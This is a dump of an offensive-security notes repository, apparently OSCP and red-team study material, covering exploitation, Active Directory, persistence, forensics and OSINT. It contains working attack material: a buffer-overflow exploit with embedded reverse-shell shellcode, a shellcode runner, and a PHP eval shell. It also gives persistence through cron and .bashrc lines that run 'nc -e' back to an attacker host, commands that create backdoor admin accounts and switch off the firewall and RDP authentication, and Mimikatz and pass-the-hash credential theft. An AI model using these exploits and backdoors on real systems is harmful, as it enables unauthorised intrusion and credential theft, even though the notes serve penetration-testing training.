├── Exploitation
    ├── readme.md
    ├── Public_Exploits.md
    └── Buffer_overflow.md
├── Infrax
    └── README.md
├── Exploits
    ├── winwebshell.php
    ├── zonetransfer.py
    ├── customShellEncoder.c
    ├── README.md
    └── atmc.py
├── Malware_Analysis
    ├── Binary_Analysis.md
    ├── README.md
    ├── REMnux_CheatSheet.md
    └── RevEng_Cheatsheet.md
├── ActiveDirectory
    ├── Bloodhound.md
    ├── AD_Resources.md
    ├── LateralMovement.md
    ├── Attacks.md
    └── ReadMe.md
├── Unix
    ├── Linux_Post_Exploit.md
    └── Linux_Shells.md
├── Windows
    ├── Readme.md
    ├── Windows_Persistence.md
    ├── Windows_Shells.md
    └── Windows_AV.md
├── ToDo.md
├── Enumeration
    └── OSINT.md
├── README.md
├── Digital_Forensics
    ├── Linux_Forensics.md
    ├── Windows_Survey.md
    └── Windows_Forensics.md
├── newKali.sh
├── Web
    ├── File_Inclusion.md
    ├── CMS.md
    ├── Command_Injection.md
    ├── README.md
    └── lfi2rce_via_php_filters.py
├── Cloud
    └── ReadMe.md
├── Tunneling
    ├── Pivot_Scanning.md
    └── README.md
├── Resources
    ├── DEFCON29.md
    └── ResourceDump.md
├── Cracking.md
└── Report.md


/Exploitation/readme.md:
--------------------------------------------------------------------------------
1 | # ReadMe   
2 | My exploit dev notes have moved to [Binary Exploitation notes](https://github.com/lw8192/Purple-Team-Scripts/tree/main/Binary_Exploitation))           
3 |   
4 | 


--------------------------------------------------------------------------------
/Infrax/README.md:
--------------------------------------------------------------------------------
 1 | # Red Team Infrastructure    
 2 | ## C2 Frameworks   
 3 | Metasploit   
 4 | Empire      
 5 | Sliver, [Sliver 101](https://notateamserver.xyz/sliver-101/)         
 6 | Cobalt Strike    
 7 | [PoshC2](https://github.com/nettitude/PoshC2)      
 8 | [Mythic](https://github.com/its-a-feature/Mythic)    
 9 | [Pupy](https://github.com/n1nj4sec/pupy)     
10 | 


--------------------------------------------------------------------------------
/Exploits/winwebshell.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | $fh = fopen('php://stdin', 'r');
 3 | $cmd = '';
 4 | $bcLvl = 0;
 5 | while (true)
 6 | {
 7 |     $line = rtrim(fgets($fh));
 8 |     $bcLvl += substr_count($line, '{') - substr_count($line, '}');
 9 |     $cmd.= $line;
10 |     if ($bcLvl > 0 or substr($cmd, -1) !== ';')
11 |     continue;
12 |     eval($cmd);
13 |     $cmd = '';
14 | }
15 | ?>
16 | 


--------------------------------------------------------------------------------
/Exploits/zonetransfer.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | import dns.resolver
 3 | import dns.zone
 4 | servers=[]
 5 | servers = dns.resolver.resolve('megacorpone.com', 'NS')
 6 | for i in servers:
 7 |     server_ips  = dns.resolver.resolve(i.target, 'A')
 8 |     for ip in server_ips:
 9 |         try:
10 |             zone = dns.zone.from_xfr(dns.query.xfr(str(ip), 'megacorpone.com'))
11 |             #print(zone)
12 |             for host in zone:
13 |                 print("Found Host: {}".format(host)+".megacorpone.com")
14 |         except Exception as e:
15 |             continue
16 | 


--------------------------------------------------------------------------------
/Exploits/customShellEncoder.c:
--------------------------------------------------------------------------------
 1 | //encoder blank template
 2 | //compile with: gcc -m32 -z execstack -fno-stack-protector test.c -o test
 3 | 
 4 | #include <stdio.h>
 5 | 
 6 | unsigned char buf[] = 
 7 | "\xda\xdb\xd9\x74\x24\xf4\x5a\xbe\x05\x26\x9f\xe4\x2b\xc9\xb1"
 8 | "\x0c\x31\x72\x18\x83\xea\xfc\x03\x72\x11\xc4\x6a\x8e\x12\x50"
 9 | "\x0c\x1d\x42\x08\x03\xc1\x03\x2f\x33\x2a\x60\xd8\xc4\x5c\xa9"
10 | "\x7a\xac\xf2\x3c\x99\x7c\xe3\x34\x5e\x81\xf3\x67\x3c\xe8\x9d"
11 | "\x58\xa2\x8b\x12\xce\x22\x1b\x86\x87\xc2\x6e\xa8";
12 |  
13 |  int main(){
14 |      int (*ret)();
15 |      ret = (int(*)())buf;
16 |      ret();
17 |  
18 |      return 0;
19 |  }
20 | 


--------------------------------------------------------------------------------
/Exploits/README.md:
--------------------------------------------------------------------------------
 1 | # Exploits and Tools   
 2 | ## Red Team Infrastructure    
 3 | https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki    
 4 | 
 5 | ## Learning Resources    
 6 | https://github.com/infosecn1nja/Red-Teaming-Toolkit     
 7 | https://shogunlab.gitbook.io/building-c2-implants-in-cpp-a-primer/    
 8 | https://www.opensecuritytraining.info/IntroX86.html    
 9 | https://legend.octopuslabs.io/sample-page.html    
10 | https://dayzerosec.com/    
11 | https://github.com/guyinatuxedo/nightmare     
12 | http://exploit.education/phoenix/      
13 | 
14 | ## Windows    
15 | [Vulnerable Drivers](https://github.com/magicsword-io/LOLDrivers)    
16 | 


--------------------------------------------------------------------------------
/Malware_Analysis/Binary_Analysis.md:
--------------------------------------------------------------------------------
 1 | # Binary Analysis    
 2 | [Max Kersten Binary Analysis Course](https://maxkersten.nl/binary-analysis-course/)    
 3 | [Binary Exploitation Notes](https://exploit-notes.hdks.org/exploit/binary-exploitation/)    
 4 | [Georgia Tech Reverse Engineering and Binary Exploitation Tutorials](https://tc.gts3.org/cs6265/2019/tut/tut01-warmup1.html)    
 5 | [Nightmare: Intro to Binary Exploitation / Reverse Engineering](https://guyinatuxedo.github.io/index.html)    
 6 | 
 7 | 
 8 | ## Python Binaries Created by PyInstaller    
 9 | Use [pyinstxtractor](https://github.com/extremecoders-re/pyinstxtractor) to extract the .pyc files    
10 | Then [python-decompile3](https://github.com/rocky/python-decompile3) to get the source code of the .pyc file    
11 | 
12 | 


--------------------------------------------------------------------------------
/ActiveDirectory/Bloodhound.md:
--------------------------------------------------------------------------------
 1 | # BloudHound Cheatsheet     
 2 | [BloodHound](https://github.com/BloodHoundAD)    
 3 | ## Start  
 4 | 
 5 |     service neo4j start
 6 |     http://localhost:7474/
 7 | ## On Target   
 8 | Sharphound builds[here](https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors)    
 9 | ## Upload Sharphound.ps1 and run using PowerShell   
10 | 
11 |     .\SharpHound.ps1
12 |     Invoke-BloodHound -CollectionMethod All -OutputDirectory .    
13 | ### SharpHound.exe     
14 | 
15 |     .\SharpHound.exe --CollectionMethod All --domain <DOMAIN>    
16 | ### Within Meterpreter  
17 | 
18 |     load powershell
19 |     powershell_execute "Invoke-BloodHound -CollectionMethod All -OutputDirectory ."
20 | ## Analyze Results   
21 | On attack box:   
22 | 
23 |     bloodhound
24 |     drag& drop the transferred zip file    
25 | 


--------------------------------------------------------------------------------
/Unix/Linux_Post_Exploit.md:
--------------------------------------------------------------------------------
 1 | # Linux Post Exploitation   
 2 | ## Network Discovery    
 3 |     netstat -antp; arp -a 
 4 |     for x in {1 .. 254};do (ping -c 1 l.l.l.$x | grep "bytes from" &); done | cut -d " " 
 5 |     cat /etc/hosts     
 6 |     
 7 | ## Linux Persistence   
 8 | [Red Team Linux Persistence](https://www.linode.com/docs/guides/linux-red-team-persistence-techniques/)    
 9 | ### cronjobs    
10 | 
11 |     crontab -e    
12 |      * * * * * nc <KALI-IP> <PORT> -e /bin/sh    #add below line as a cronjob   
13 | ### nohup       
14 | ### init.d scripts   
15 | ### Adding a privileged user      
16 | 
17 |      useradd  -m -s /bin/bash user   #create user     
18 |      usermod -aG sudo user     #add to sudo group      
19 |      passwd user    #set a password    
20 | ### SSH keys    
21 | Generate a key pair then add the public key to ~/authorized_keys    
22 | 
23 |      ssh-keygen     #generate a key pair   
24 |      #add id_rsa.pub to ~/.ssh/authorized_keys    
25 | ### Unix Shell Config Modification       
26 | 
27 |      #edit ~/.bashrc      
28 |      nc -e /bin/bash <KALI-IP> <PORT> 2>/dev/null &     #add a line to receive a shell every time the user logs on   
29 | 


--------------------------------------------------------------------------------
/Malware_Analysis/README.md:
--------------------------------------------------------------------------------
 1 | # Malware Analysis 
 2 | ## Resource Dumps   
 3 | https://github.com/rshipp/awesome-malware-analysis   
 4 | https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Malware.md   
 5 | 
 6 | ## Online Courses 
 7 | https://github.com/nullcharb/The-Art-of-Malware-Analysis   
 8 | [Reverse Engineering x64 Windows Course](https://github.com/0xZ0F/Z0FCourse_ReverseEngineering)     
 9 | https://github.com/jstrosch/learning-malware-analysis   
10 | [University of Cincinnati Malware Analysis Class](https://github.com/ckane/CS7038-Malware-Analysis)    
11 | 
12 | ## Malware Samples
13 | https://zeltser.com/malware-sample-sources/   
14 | https://github.com/jstrosch/malware-samples   
15 | 
16 | ## Cheatsheets
17 | [Analyzing Malcious Documents](https://sansorg.egnyte.com/dl/YrwOdFIm1I) 
18 | [Malware & Rev Eng Cheatsheet](https://sansorg.egnyte.com/dl/suRa4RLonp) 
19 | 
20 | ## Books  
21 | Practical Malware Analysis   
22 | Malware Analyst's Cookbook   
23 | 
24 | ## Extra Cool Stuff   
25 | https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering    
26 | Limelighter - real and fake signing. https://github.com/Tylous/Limelighter   
27 | https://github.com/mytechnotalent/Hacking-Windows/blob/main/Hacking_Windows.pdf   
28 | 


--------------------------------------------------------------------------------
/Windows/Readme.md:
--------------------------------------------------------------------------------
 1 | # Windows Resources 
 2 | Use this folder for triaging and compromising a standalone Windows box. For domain compromising, see [Active_Directory](https://github.com/Scr1ptK1ddie/OSCPprep/tree/main/ActiveDirectory) folder.   
 3 | ## Contents 
 4 | - [Windows Resources](#windows-resources)
 5 |   * [Contents](#contents)
 6 |   * [Tools](#tools)
 7 |     + [Impacket](#impacket)
 8 |     + [Evil-WinRM](#evil-winrm)
 9 |     + [Metasploit and Meterpreter](#metasploit-and-meterpreter)
10 | ## Tools
11 | ### Impacket 
12 | https://github.com/SecureAuthCorp/impacket
13 | 
14 |     apt install impacket-scripts
15 | 
16 | Local Locations:
17 | 
18 |     /usr/share/doc/python3-impacket/examples   
19 |     
20 | [lsassy](https://github.com/PowerShellMafia/PowerSploit): script to extract creds remotely using impacket  
21 |       
22 | ### Evil-WinRM
23 | Access port 5985. Use with a username / password or username / hash. 
24 | 
25 |     $ evil-winrm -u Administrator -p password -i 10.10.10.10    
26 | 
27 | ### Metasploit and Meterpreter   
28 | Meterpreter shell: need to migrate to lsass process to dump hashes, due to process permissions on Windows.         
29 |     
30 |     meter > migrate -N lsass.exe       
31 |     meter > hashdump     
32 |     
33 | ### Dump Hives and Extract with Mimikatz     
34 | AV products will flag on Mimikatz so only do this if you are sure if won't (otherwise crack the hashes locally).     
35 | 
36 |     C:\Temp> reg save hklm\sam sam.hive && reg save hklm\system system.hiv     
37 |     C:\Temp> c:\tools\mimikatz\x64\mimikatz.exe "lsadump::sam /sam:sam.hiv /system:system.hiv" "exit"   
38 |     
39 |     username:userid:LANMAN:NTHASH   #hash format when extracted  
40 | 


--------------------------------------------------------------------------------
/ActiveDirectory/AD_Resources.md:
--------------------------------------------------------------------------------
 1 | # Active Directory Resources 
 2 | 
 3 | https://blog.harmj0y.net/   
 4 | https://adsecurity.org/?page_id=1821   
 5 | https://metasploit.help.rapid7.com/docs/about-post-exploitation   
 6 | http://www.pentest-standard.org/index.php/Post_Exploitation   
 7 | [Active Directory Security 101 Class](https://github.com/cfalta/adsec)    
 8 | https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse    
 9 | [Understanding Windows Lateral Movement](https://attl4s.github.io/assets/pdf/Understanding_Windows_Lateral_Movements.pdf)    
10 | [Attacking Active Directory: 0 to 0.9](https://zer1t0.gitlab.io/posts/attacking_ad/)   
11 | [Active Directory Enumeration | ATTL4S](https://attl4s.github.io/assets/pdf/Understanding_Active_Directory_Enumeration.pdf)    
12 | [Adsecurity Blog](https://adsecurity.org/)    
13 | [RedTeam Security Live Hacking Demonstration](https://www.youtube.com/watch?v=k6EOhO3JKCQ)    
14 | [NetNTLMtoSilverTicket | NotMedic's Github](https://github.com/NotMedic/NetNTLMtoSilverTicket)    
15 | 
16 | 
17 | ## Other Cool Cheatsheets 
18 | https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993   
19 | https://github.com/ihebski/A-Red-Teamer-diaries   
20 |   
21 | 
22 | ## Kerberos 
23 | https://medium.com/@t0pazg3m/pass-the-ticket-ptt-attack-in-mimikatz-and-a-gotcha-96a5805e257a   
24 | https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat   
25 | https://posts.specterops.io/kerberoasting-revisited-d434351bd4d1   
26 | https://www.harmj0y.net/blog/redteaming/not-a-security-boundary-breaking-forest-trusts/   
27 | https://www.varonis.com/blog/kerberos-authentication-explained/   
28 | https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf   
29 | https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1493862736.pdf   
30 | https://www.redsiege.com/wp-content/uploads/2020/04/20200430-kerb101.pdf   
31 | 
32 | 
33 | 
34 | 


--------------------------------------------------------------------------------
/ToDo.md:
--------------------------------------------------------------------------------
 1 | # OSCP Notes 
 2 | Start with running newKali.sh to download tools needed. 
 3 | 
 4 | OSCP 2022 Exam:   
 5 | Active Directory set of 2 host and domain controller (40 points, no partial points)        
 6 | Box 1 (20 points)    
 7 | Box 2 (20 points)   
 8 | Box 3 (20 points)    
 9 | Bonus Points (10 points)    
10 | *One of the standalone boxes may be a buffer overflow
11 | *Bonus points: complete 80% of the topic exercises for each topic, submit proof.txt for at least 30 lab machines.       
12 | 
13 | 
14 | Go through and add to notes:   
15 | https://raphaelrichard-sec.fr/learning-notes   
16 | Windows - https://github.com/bertvv/cheat-sheets/blob/master/docs/Windows.md   
17 | Tunneling - https://github.com/opsdisk/the_cyber_plumbers_handbook   
18 | https://github.com/sdcampbell/Internal-Network-Pentest-MindMap/blob/main/Internal%20Network%20Pentest%20MindMap.pdf   
19 | https://github.com/ihebski/A-Red-Teamer-diaries    
20 | https://github.com/t3l3machus/pentest-pivoting  
21 | https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Active_Directory.md   
22 | https://github.com/S3cur3Th1sSh1t/Pentest-Tools   
23 | https://github.com/0x4D31/awesome-oscp   
24 | https://github.com/tasooshi/pentesting-cookbook     
25 | 
26 | Courses to do:  
27 | TCM Security Practical Ethical Hacking Course  
28 | TCM Windows Priv Esc   
29 | TCM Linux Priv Esc   
30 | TCM Movement, Pivoting and Persistence  
31 | Go back thru Tiberius Win / Lin priv esc courses  
32 | John Hammond Active Directory youtube videos - https://www.youtube.com/watch?v=pKtDQtsubio&list=PL1H1sBF1VAKVoU6Q2u7BBGPsnkn-rajlp   
33 | 
34 | OSCP Boxes to do:    
35 | Hack the Box - [TJ_Nulls OSCP Prep List Walkthroughs](https://www.youtube.com/playlist?list=PLidcsTyj9JXK-fnabFLVEvHinQ14Jy5tf)     
36 | Scratch notes (organize):    
37 | Win persistence - https://in.security/2019/04/03/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/  (WMI events)    
38 | Article series - https://pentestlab.blog/category/red-team/persistence/   
39 | 


--------------------------------------------------------------------------------
/Windows/Windows_Persistence.md:
--------------------------------------------------------------------------------
 1 |  # Windows Persistence 
 2 |  Methods: service, registry keys, startup folders, scheduled tasks, WMI permanent events.
 3 |  
 4 |      net user USERNAME PASSWORD /add
 5 |      net localgroup Administrators USERNAME /add
 6 |      net localgroup "Remote Management Users" USERNAME /add    
 7 |      
 8 |  Metasploit Modules:  
 9 |  
10 |      exploit/windows/local/persistence_service   #to add a service    
11 |      exploit/windows/local/wmi_persistence       #wmi event subscription, triggered with logon failures (event ID 4625)   
12 | ____ 
13 | ## Access        
14 | 
15 | ### Persistence Methods   
16 | https://persistence-info.github.io/   
17 | 
18 | ### Pass the Hash      
19 | 
20 |     pth-winexe //192.168.149.10 -U Administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e cmd   
21 |     evil-winrm -u Administrator -H ADMIN_HASH -i IP      #using evil-winrm   
22 | ### WinRM
23 |  Enabled WinRm as Administrator to use evil-winrm. -H to pass the hash
24 |  
25 |      WinRM quickconfig       
26 |  
27 | ### Enabling RDP  
28 | Add a user with RDP / admin privs 
29 | 
30 |     net user evil 3v1lPass /add
31 |     net localgroup Administrators evil /add
32 |     net localgroup "Remote Desktop Users" evil /ADD
33 | 
34 | Enable RDP 
35 | 
36 |     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
37 | 
38 | Turn firewall off
39 | 
40 |     netsh firewall set opmode disable
41 |     or
42 |     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
43 | 
44 | If you get this error:
45 | "ERROR: CredSSP: Initialize failed, do you have correct kerberos tgt initialized ?
46 | Failed to connect, CredSSP required by server.""
47 | Add this reg key:
48 | 
49 |     reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f   
50 | RDP with a shared folder    
51 | 
52 |      xfreerdp /v:IP /u:USERNAME /p:PASSWORD +clipboard /dynamic-resolution /drive:/usr/share/windows-resources,share \\tsclient\share\mimikatz\x64\mimikatz.exe   
53 | 


--------------------------------------------------------------------------------
/Enumeration/OSINT.md:
--------------------------------------------------------------------------------
 1 | # OSINT   
 2 | ## Tools 
 3 | [OSINT Tools](https://www.osinttechniques.com/osint-tools.html)  <- List of OSINT tools for any occassion   
 4 | [The Harvester](https://github.com/laramies/theharvester)    <- gathers emails, names, subdomains, IPs and URLs      
 5 | [Recon-ng](https://github.com/lanmaster53/recon-ng)  <- Recon framework   
 6 | Shodan <- Banners and scanning    
 7 | Spiderfoot <- Give scan name and seed target (domain name, host name, email) to collect data. Free and paid versions.   
 8 | [hunter.io](https://hunter.io/)       <- find email addresses for a company     
 9 | 
10 | 
11 | ## DNS Look Up   
12 | whois, nslookup, dig, host <-manual tools   
13 | Dierce, DNSenum, DNSrecon <-automated tools  
14 | [DNSDumpster](https://dnsdumpster.com/) <- online tool   
15 | Dump DNS records to figure out what is accessible using a zone transfer.    
16 | 
17 |     #Record types: MX - mail server, TXT - text, AXFR - zone transfer   
18 |     
19 |     nslookup -type=any <DOMAIN>          
20 |     whois <DOMAIN>      #id auth server  
21 |     host -t axfr -l <DOMAIN> <DNSSERVER>   
22 |     dig -t axfr #zone transfer    
23 |     dig -t mx <DOMAIN>  
24 |     dig -t any <DOMAIN>     
25 |     nmap --script dns-brute site.net -sS -p 53      #brute force      
26 |     dnsrecon.py -d site.net      
27 |     dnsrecon.py -d site.net -t brt -D /opt/dnsrecon/namelist.txt    
28 | 
29 | ## Breached Data   
30 | HaveIBeenPwned.com    
31 | Usually you can't use breached data on a pen test - makes sure to confirm with legal!   
32 | 
33 | ## Site Enum   
34 | Info gathering: https://www.sec.gov/edgar/search-and-access, job networking sites, xxlek.com, namechk.com, whatsmyname.app     
35 | Sites to use: shodan.io, network-tools.com, viewdns.info, securityspace.com    
36 | Crawl site for a WordList:     
37 | 
38 |     cewl -m 8 -w out_list.txt -a --meta-file list-meta.txt -e --email_file list_email.txt https://site.com/
39 | ### Google Dorks  
40 | Google Hacking db: collect of dorks. FGDS (Fast Google Dorks Scan) can automate but also get you banned.    
41 | 
42 |     site:site.com     intext:@site.com      #id emails for domain    
43 |     filetype:pdf "password"      "policy"site:site.org        #search PDFs for keywords and policy for domain    
44 |     "index of /" backup.ab       #id dir lists where backup.ab is (Android device backup)     
45 |     filetype:rd        #id rdp connection profiles    
46 |     link:www.[site].com     
47 | 


--------------------------------------------------------------------------------
/Exploits/atmc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python
 2 | 
 3 | #Exploit 38457, https://www.exploit-db.com/exploits/38457
 4 | #Ported exploit to Python, tested on Windows 7
 5 | 
 6 | import os
 7 | import struct
 8 | 
 9 | prefix = ""
10 | offset = 248
11 | overflow = "A" * offset
12 | retn= struct.pack('<L', 0x1003789d)      #RET Address   = 0x1003789d : "\xFF\xE4"
13 | padding = "\x90" *40
14 | 
15 | #payload
16 | #msfvenom -p windows/x86/shell_reverse_tcp lhost=192.168.0.29 lport=4444 exitfunc=thread -f python -b "\x00\x09\x0a\xa0"
17 | 
18 | buf =  b""
19 | buf += b"\xbe\x32\xf1\xaf\xbe\xdb\xd6\xd9\x74\x24\xf4\x5b\x2b"
20 | buf += b"\xc9\xb1\x52\x31\x73\x12\x83\xc3\x04\x03\x41\xff\x4d"
21 | buf += b"\x4b\x59\x17\x13\xb4\xa1\xe8\x74\x3c\x44\xd9\xb4\x5a"
22 | buf += b"\x0d\x4a\x05\x28\x43\x67\xee\x7c\x77\xfc\x82\xa8\x78"
23 | buf += b"\xb5\x29\x8f\xb7\x46\x01\xf3\xd6\xc4\x58\x20\x38\xf4"
24 | buf += b"\x92\x35\x39\x31\xce\xb4\x6b\xea\x84\x6b\x9b\x9f\xd1"
25 | buf += b"\xb7\x10\xd3\xf4\xbf\xc5\xa4\xf7\xee\x58\xbe\xa1\x30"
26 | buf += b"\x5b\x13\xda\x78\x43\x70\xe7\x33\xf8\x42\x93\xc5\x28"
27 | buf += b"\x9b\x5c\x69\x15\x13\xaf\x73\x52\x94\x50\x06\xaa\xe6"
28 | buf += b"\xed\x11\x69\x94\x29\x97\x69\x3e\xb9\x0f\x55\xbe\x6e"
29 | buf += b"\xc9\x1e\xcc\xdb\x9d\x78\xd1\xda\x72\xf3\xed\x57\x75"
30 | buf += b"\xd3\x67\x23\x52\xf7\x2c\xf7\xfb\xae\x88\x56\x03\xb0"
31 | buf += b"\x72\x06\xa1\xbb\x9f\x53\xd8\xe6\xf7\x90\xd1\x18\x08"
32 | buf += b"\xbf\x62\x6b\x3a\x60\xd9\xe3\x76\xe9\xc7\xf4\x79\xc0"
33 | buf += b"\xb0\x6a\x84\xeb\xc0\xa3\x43\xbf\x90\xdb\x62\xc0\x7a"
34 | buf += b"\x1b\x8a\x15\x2c\x4b\x24\xc6\x8d\x3b\x84\xb6\x65\x51"
35 | buf += b"\x0b\xe8\x96\x5a\xc1\x81\x3d\xa1\x82\x6d\x69\xa9\x4f"
36 | buf += b"\x06\x68\xa9\x7e\x8a\xe5\x4f\xea\x22\xa0\xd8\x83\xdb"
37 | buf += b"\xe9\x92\x32\x23\x24\xdf\x75\xaf\xcb\x20\x3b\x58\xa1"
38 | buf += b"\x32\xac\xa8\xfc\x68\x7b\xb6\x2a\x04\xe7\x25\xb1\xd4"
39 | buf += b"\x6e\x56\x6e\x83\x27\xa8\x67\x41\xda\x93\xd1\x77\x27"
40 | buf += b"\x45\x19\x33\xfc\xb6\xa4\xba\x71\x82\x82\xac\x4f\x0b"
41 | buf += b"\x8f\x98\x1f\x5a\x59\x76\xe6\x34\x2b\x20\xb0\xeb\xe5"
42 | buf += b"\xa4\x45\xc0\x35\xb2\x49\x0d\xc0\x5a\xfb\xf8\x95\x65"
43 | buf += b"\x34\x6d\x12\x1e\x28\x0d\xdd\xf5\xe8\x2d\x3c\xdf\x04"
44 | buf += b"\xc6\x99\x8a\xa4\x8b\x19\x61\xea\xb5\x99\x83\x93\x41"
45 | buf += b"\x81\xe6\x96\x0e\x05\x1b\xeb\x1f\xe0\x1b\x58\x1f\x21"
46 | 
47 | 
48 | 
49 | postfix = "C" * (1000-248-4-40-len(buf))
50 | 
51 | buffer = prefix + overflow + retn + padding + buf + postfix
52 | 
53 | f = open("exploit.asx",'wb')
54 | f.write(buffer)
55 | f.close()
56 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Red Team Rising 
 2 | A collection of notes for red and purple teamers sourced from various courses and self study. Topics include Penetration Testing, Digital Forensics, Exploit Development and Malware Analysis.     
 3 | 
 4 | ## Study Resources   
 5 | [Hack the Box](https://www.hackthebox.com/)    
 6 | [TryHackMe](https://tryhackme.com/)    
 7 | [Over the Wire](https://overthewire.org/wargames/)    
 8 | [SANS](https://www.sans.org/)   
 9 | [TCM Academy](https://academy.tcm-sec.com/)    
10 | [Taggart Institute](https://taggartinstitute.org/p/home)     
11 | [HackTricks](https://book.hacktricks.xyz/welcome/readme)      
12 | [Pwncollege](https://pwn.college/)    
13 | [Hacker101](https://www.hacker101.com/)    
14 | 
15 | ### YouTube Channels and People to Follow     
16 | [John Hammond](https://www.youtube.com/@_JohnHammond)             
17 | [Black Hills Information Security](https://www.youtube.com/@BlackHillsInformationSecurity)      
18 | [Ippsec](https://www.youtube.com/@ippsec)    
19 | [Hak5](https://www.youtube.com/@hak5)   
20 | [STOK](https://www.youtube.com/@STOKfredrik)    
21 | [Antisyphon](https://www.youtube.com/@AntisyphonTraining)
22 | [Shannon Morse](https://www.youtube.com/@ShannonMorse)    
23 | [MalwareTech](https://www.youtube.com/@MalwareTechBlog)    
24 | [NahamSec](https://www.youtube.com/@NahamSec)     
25 | [The Cyber Mentor](https://www.youtube.com/@TCMSecurityAcademy)        
26 | [LiveOverFlow](https://www.youtube.com/@LiveOverflow)    
27 | 
28 | ## OS Variants and Distros      
29 | [Kali Linux](https://www.kali.org/): Classic pen test          
30 | [Parrot](https://www.parrotsec.org/): pen test, more lightweight then Kali    
31 | [Demon Linux](https://github.com/RackunSec/Summon): cool pen test variant    
32 | [Commando VM](https://github.com/mandiant/commando-vm): Windows based, useful for Active Directory enviroments    
33 | [Flare VM](https://github.com/mandiant/flare-vm): Windows box for malware analysis    
34 | [REMnux](https://remnux.org/): Linux box for malware analysis    
35 | 
36 | ### Kali Linux     
37 | Update & upgrade without breaking anything:     
38 | ```
39 | #run as root or use sudo 
40 | apt-get update && apt-get full-upgrade && apt-get autoremove && apt-get autoclean -y
41 | ```
42 | Fixing VMWare tools    
43 | ```
44 | sudo restart-vm-tools     #run restart script
45 | 
46 | sudo apt install -y --reinstall open-vm-tools-desktop fuse && reboot    #reinstall and reboot   
47 | ```
48 | Search for a file in a package:    
49 | ```
50 | apt-file search execstack  
51 | ```
52 | 
53 | 


--------------------------------------------------------------------------------
/Digital_Forensics/Linux_Forensics.md:
--------------------------------------------------------------------------------
 1 | # Linux Forensics    
 2 | For most Linux distros (Debian, Ubuntu etc)    
 3 | ## Linux Logs
 4 | Logs: /var/log     
 5 | log config: /etc/syslog.conf, /etc/rsyslog.conf     
 6 | 
 7 | Can clean plaintext logs, not binary (usually).          
 8 | 
 9 | /var/log/btmp: failed logins    
10 | /var/log/wtmp: historical data of logins    
11 | btmp and wtmp are both binary logs, read using last    
12 | 
13 | every user that logins in on Linux host - logs in auth log    
14 | /var/log/auth.log    
15 | 
16 | Syslog: messages recorded by host about system activity, different logging levels.    
17 | /var/log/syslog   
18 | 
19 | ## Command History    
20 | sudo commands - stored in auth log     
21 | 
22 |     cat/var/log/auth.log* |grep-i COMMAND | tail   
23 | 
24 | any commands other then sudo - stored in user's bash history in home dir      
25 | Vim text editor - stores logs for opened files in vim in ~/.viminfo      
26 | 
27 | .bashrc file that runs when bash shell is spawned     
28 | Systemwide settings
29 | /etc/bash.bashrc     
30 | /etc/profile    
31 | 
32 | ## Timestomping     
33 | Changing timestamps of files on Linux to blend in.    
34 | Mtime - last data modification.    
35 | Atime - last data access.   
36 | Ctime - last file status change.     
37 | Use touch to change the modify or access time.     
38 | Better: change system time, 'touch' the file, then change the system time back to change the ctime.    
39 | https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html     
40 | 
41 | ## Browser Forensics   
42 | ### Firefox   
43 | Metasploit: post/multi/gather/firefox_creds    
44 | ~/.mozilla/firefox   
45 | check profiles.ini for profile names   
46 | then go to the profile name folder   
47 | places.sqlite      #history, bookmarks, downloads   
48 | bookmarkbackups     #bookmarks   
49 | logins.json         #saved logins (passwords are encrypted)      
50 | signons.sqlite      #also saved logins    
51 | 
52 |     #download file then examine using the below command   
53 |     cat logins.json | python -m json.tool > formatted.json  
54 | download places.sqlite and open with [sqlitebrowser](https://www.kali.org/tools/sqlitebrowser/). Check tables: moz_origins, moz_places    
55 | [Tool to decrypt Firefox and Thunderbird Creds](https://github.com/unode/firefox_decrypt)   
56 | [Dumpzilla Tool](https://github.com/Busindre/dumpzilla)     
57 | 
58 | Thunderbird     
59 | Metasploit: post/multi/gather/thunderbird_creds    
60 | Folder: /home/[username]/.thunderbird/$PROFILE.default/    
61 | global-messages.db.sqlite    #look at tables contacts, identities, messages, messagesText_content    
62 | 


--------------------------------------------------------------------------------
/newKali.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash 
 2 | #run script as sudo in new Kali to download tools needed 
 3 | apt-get update && apt-get upgrade
 4 | apt-get install python3
 5 | apt-get install pip3
 6 | 
 7 | #download pimpmykali - impacket, seclists, etc
 8 | wget https://raw.githubusercontent.com/Dewalt-arch/pimpmykali/master/pimpmykali.sh |bash    
 9 | 
10 | #download search that hash 
11 | python3 -m pip install pipx
12 | pip install search-that-hash  
13 | 
14 | #download web tools 
15 | apt-get install feroxbuster sshuttle chisel gobuster nikto  
16 | 
17 | #download compiler tools 
18 | apt-get install gcc-multilib mingw-w64
19 | pipx ensurepath
20 | pipx install crackmapexec  
21 | 
22 | #download foxy proxy, user agent switcer and wapp analyzer 
23 | wget https://addons.mozilla.org/firefox/downloads/file/3616824/foxyproxy_standard-7.5.1-an+fx.xpi -o /tmp/foxyproxy_standard-7.5.1-an+fx.xpi
24 | firefox /tmp/foxyproxy_standard-7.5.1-an+fx.xpi
